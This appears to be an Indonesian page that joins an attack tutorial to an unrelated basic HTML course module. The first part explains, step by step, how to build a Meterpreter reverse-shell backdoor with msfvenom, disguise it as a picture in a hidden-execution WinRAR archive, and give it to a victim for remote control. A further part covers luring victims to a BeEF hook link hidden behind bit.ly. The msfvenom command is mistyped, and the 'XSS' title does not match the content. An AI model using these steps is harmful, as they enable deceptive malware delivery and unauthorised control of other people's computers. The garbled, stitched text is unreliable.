Exploit XSS with Image

Salah satu cara Exploit XSS sebuah web adalah melalui gambar. Berikut cara mengexplpoit XSS gambar.

1. Pertama kita cek ip address jaringan laptop kita dengan cara mengetikkan “ifconfig” pada terminal, kemudiankita membuat program(exe) yang akan menjadi backdoor di PC korban dengan cara mengetikkan di terminal : msfvenom -p windows/meterpreter/reserve_tcp LHOST 192.168.144.128 LPORT=4444 -f exe > nama_program.exe

2. Setelah itu kita membuat icon untuk program backdoor kita dengan menggunakan website icoconverter.com. kita upload gambar original kita terlebih dahulu, kemudian di sesuaikan dengan setting seperti pada gambar. Dan terakhir kita klik Convert Ico.

3. Dan hasilnya akan ada 3 file persiapan untuk membuat exploit gambar

4. Setelah itu kita copy 3 file tersebut ke OS Windows untuk membuat exploit gambar tersebut menggunakan aplikasi WinRar.

5. Setelah itu kita block atau pilih foto original dan aplikasi backdoor kita, klik kanan dan pilih add to archieve

6. Kemudian setting sesuai seperti digambar

7. Kemudian klik advanced, SFX Options...

8. Klik Setup isikan dengan nama gambar original serta nama program

9. Selanjutnya kita ke Text and icon agar aplikasi kita memiliki icon yang telah kita persiapkan tadi.

10. Lalu kita ke Modes untuk menghide(menyembunyikan) semua aktivitas program backdoor dan hanya akan mengeksekusi gambar, sehingga pada saat membuka program layaknya membuka file gambar seperti biasanya. Tetapi pada saat yang bersamaan program telah melakukan pengeksekusian untuk membuat backdoor pada PC korban

11. Dan hasil dari settingan tadi ialah seperti gambar biasa.

12. Dan tinggal kita berikan program yang telah kita buat tadi ke Korban dan menunggu korban membuka di Pcnya. Dan hasil setelah program dibuka ialah layaknya gambar biasanya.

13. Kemudian kita kembali ke OS Kali Linux untuk meremote PC Korban, buka terminal dan ketikkan msfconsole, dan ikuti langkah selanjutnya

14. Setelah kita memasukkan perintah exploit maka hasilnya ialah sepeti ini, dan kita sudah mendapatkan akses untuk mengontrol PC Korban

Beef Exploit Tutorial

Beef adalah singkatan dari Browser Exploit Framework. Adalah salah satu tools penetrasi web browser pada kali linux. Simak cara menggunakan BeeF berikut ini.







1. Kita buka aplikasi beef kita dan akan muncul terminal

2. Kita tunggu sebentar dan otomatis browser akan terbuka dan masuk ke website beef. Dimana username serta passwordnya adalah beef

3. Setelah login kita mengklik yang ada pada gambar untuk membuat website hook (penjerat) kita.

4. Copy link tersebut dan ubah ip address nya sesuai dengan ip address jaringan kita

5. Kemudian agar korban tidak curiga dengan website yang akan kita kirim kepadanya, kita ubah atau perpendekkan link kita dengan bit.ly

6. Kemudian kita kirimkan link tersebut ke korban, yang PC nya ingin kita hack

7. Setelah korban membuka link tersebut kita dapat mengeceknya di website beef kita, dan kita telah mendapatkan akses untuk PC korban (telah terhack). Dan kita dapat melakukan perintah-perintah yang telah tersedia di Website beef tersebut untuk mengontrol PC korban

Selesai, selamat mencoba :)

Modul 1 Dasar - Dasar HTML Praktikum Pemrograman Web

MODUL 1

DASAR-DASAR HTML

---

Ringkasan

     Dalam praktikum kali ini, Anda akan mempelajari penggunaan dari beberapa tag dasar yang hampir akan selalu digunakan dalam setiap praktikum Anda nantinya. Perhatikan daftar tag di bawah ini, serta kegunaan utamanya dalam sebuah halaman HTML.

Tag HTML Dasar

• <html> = Mendefinisikan sebuah dokumen html.
• <body> = Mendefinisikan isi/badan suatu dokumen.
• <br> = Menyisipkan sebuah line break
• <h1-h6> = Mendefinisikan heading ke 1 s/d heading ke 6
Contoh:

Ini h1

Ini h2

Ini h3

Ini h4

Ini h5

Ini h6

• <p> = Mendefinisikan sebuah paragraf
Contoh:

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

• <hr> = Mendefinisikan sebuah garis horisontal
Contoh:

---

• <!--...-->> = Mendefinisikan komentar dalam kode sumber HTML



     Setelah itu, Anda akan mempelajari penggunaan dari beberapa tag yang digunakan dalam melakukan pemformatan tampilan halaman web supaya lebih sesuai dengan keinginan atau agar lebih rapi dan terstruktur. Perhatikan beberapa daftar tag di bawah ini, serta kegunaan utamanya dalam sebuah halaman HTML. Beberapa diantaranya telah dihilangkan dari daftar tag HTML standar, namun masih memungkinkan untuk ditampilkan pada beberapa browser tertentu atau browser lama.




Tag untuk Pemformatan Teks Dasar

• <b> = Mendefinisikan teks tebal
Contoh: Ini tulisannya tebal
• <big> = Mendefinisikan teks yang lebih besar
Contoh: Ini tulisannya lebih besar
• <em> = Mendefinisikan teks yang dimiringkan
Contoh: Ini tulisannya miring
• <i> = Mendefinisikan teks yang dimiringkan
Contoh:Ini tulisannya juga miring
• <small> = Mendefinisikan teks yang lebih kecil
Contoh:Ini tulisannya lebih kecil
• <strong> = Mendefinisikan teks tebal
Contoh: Ini tulisannya tebal juga
• <sub> = Defines subscripted text
Contoh: _{Ini tulisannya lebih di bawah}
• <sup> = Mendefinisikan teks yang posisinya lebih ke atas
Contoh: ^{Ini tulisannya lebih di atas}
• <ins> = Mendefinisikan teks yang bergaris bawah
Contoh: Ini tulisannya bergaris bawah
• <del> = Mendefinisikan teks yang hendak dihapus
Contoh: Ini tulisannya tercoret



Tag untuk tampilan ‘hasil keluaran komputer’

• <code> = Mendefinisikan teks kode komputer
Contoh: T u li s an i ni sa ma de ngan ko de teks pa da kom pu ter
• <kbd> = Mendefinisikan teks dari keyboard
Contoh: Tu li san i n i da ri key word
• <samp> = Mendefinisikan teks contoh kode komputer
Contoh: Tulisan ini merupakan contoh kode komputer
• <tt> = Mendefinisikan teks model teletype
Contoh: Tul isa n in i me ru pakan mo del t el e type
• <var> = Mendefinisikan sebuah variabel
Contoh: Ini adalah variabel
• <pre> = Mendefinisikan teks preformatted
Contoh:

Tulisan ini merupahan teks preformat




Tag untuk Citation, Quotation, dan Definisi

• <abbr> = Mendefinisikan suatu kependekan
Contoh: Misalnya ini sebuah Kependekan
• <acronym> = Mendefinisikan suatu singkatan
Contoh: Misalnya ini adalah singkatannya
• <address> = Mendefinisikan suatu elemen alamat
Contoh:
Jalan Jend. A. Yani No.3
• <bdo> = Mendefinisikan arah teks
Contoh: Tulisan ini adalah tulisan yang terbalik
• <blockquote> = Mendefinisikan quotation panjang
Contoh:

Misalnya ini sebuah kutipan yang panjang. Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

• <q> = Mendefinisikan quotation pendek
Contoh: Misalnya ini adalah kutipan yang pendek
• <cite> = Mendefinisikan suatu kutipan
Contoh: Misalnya ini merupakan kutipan yang pendek
• <dfn> = Mendefinisikan suatu istilah
Contoh: Misalkan ini adalah sebuah istilah



Contoh tag untuk Entitas karakter

•     (spasi kosong) = &nbsp; atau &#160;
• < (kurang dari) = &lt; atau &#60;
• > (lebih dari) = &gt; atau &#62;
• & (dan/ampersand) = &amp; atau &#38;
• " (tanda petik/kutip) = &qout; atau &#34;
• ' (koma atas) = &#39;
• ¢ (Cent) = &cent; atau &#163;
• £ (Pound) = &pound; atau &#162;
• ¥ (Yen) = &yen; atau &#165;
• § (Section) = & atau &#167;
• © (Copyright) = &copy; atau &#169;
• ® (registered trademark) = &reg; atau &#174;
• × (MUltiplication) = &times; atau &#215;
• ÷ (Division) = &divide; atau &#247;

Ketika Anda menulis suatu dokumen, mungkin terkadang Anda menuliskan kalimat dalam bentuk poin-poin yang menerangkan tentang suatu hal. Dalam suatu halaman web, terkadang Anda juga ingin melakukan hal yang sama. Terdapat tag khusus untuk penulisan dalam format poin-poin, perhatikan daftar di bawah ini.

Tag untuk List

• <ol> = Mendefinisikan sebuah list ordered
Contoh:
1. Ini adalah list yang pertama
2. Ini adalah list yang kedua
3. Ini adalah list yang ketiga
4. Ini adalah list yang keempat
5. Ini adalah list yang kelima
• <ul> = Mendefinisikan sebuah list unordered
Contoh:
• Ini adalah list yang pertama
• Ini adalah list yang kedua
• Ini adalah list yang ketiga
• Ini adalah list yang keempat
• Ini adalah list yang kelima
• <dl> = Mendefinisikan sebuah list definisi
Contoh:

Ini adalah istilah list definisi yang pertama

Ini adalah keterangan untuk list definisi yang pertama

Ini adalah istilah list definisi yang kedua

Ini adalah keterangan untuk list definisi yang kedua

Ini adalah istilah list definisi yang ketiga

Ini adalah keterangan untuk list definisi yang ketiga

Ini adalah istilah list definisi yang keempat

Ini adalah keterangan untuk definisi list yang keempat

• <li> = Mendefinisikan sebuah item dalam list
• <dt> = Mendefinisikan sebuah istilah list definisi
• <dd> = Mendefinisikan sebuah keterangan list definisi



Latihan

      Dalam modul ini Anda akan berlatih untuk meggunakan berbagai tag dasar untuk pemrograman web menggunakan HTML. Ketikkan setiap kelompok tag dalam sebuah file, simpan dalam folder Anda sendiri yang telah ditentukan, kemudian jalankan di web browser yang telah terinstall. Ketikkan setiap kode sumber apa adanya terlebih dahulu(termasuk spasi kosong). Perhatikan hasil tampilannya, kemudian belajar untuk memodifikasi setiap kelompok tag untuk mengetahui maksud dari setiap baris tag HTML yang Anda ketikkan. Jangan lupa untuk menyimpan setiap modifikasi Anda sebelum menjalankan ulang di dalam browser.

      Silahkan mencoba juga tag yang masuk dalam kategori "dihilangkan", untuk melihat seperti apa tampilan yang dapat dimunculkan. Untuk entitas karakter, silahkan coba nomor entitas selain yang telah ada pada daftar di atas, untuk melihat entitas karakter apa saja yang dapat digunakan dalam sebuah halaman web.

      Bagian terakhir adalah list. List adalah salah satu komponen yang cukup sering digunakan dalam suatu halaman Web. Dalam bentuk aslinya, mungkin sudah tidak terlalu banyak digunakan lagi dan digantikan fungsinya dengan image(gambar), tertapi ada perlunya juga Anda mengetahui list saat tidak memiliki gambar yang akan dijadikan bullet.

1. Paragraf dan line break
2. Backround color dan heading
3. Garis horisontal dan komentar tersembunyi
4. Pemformatan teks
5. Teks yang di-preformat
6. Arah teks dan quotation
7. List unordered dan ordered
8. Jenis-jenis list ordered
9. Jenis-jenis list unordered
10. List bersarang dan list definisi

---

Copyright © 2017 Fakultas Ilmu Komputer dan Teknologi Informasi || All Rights Reserved. || Developed by HeryandyPratama || Supported by Praktikum Pemrograman Web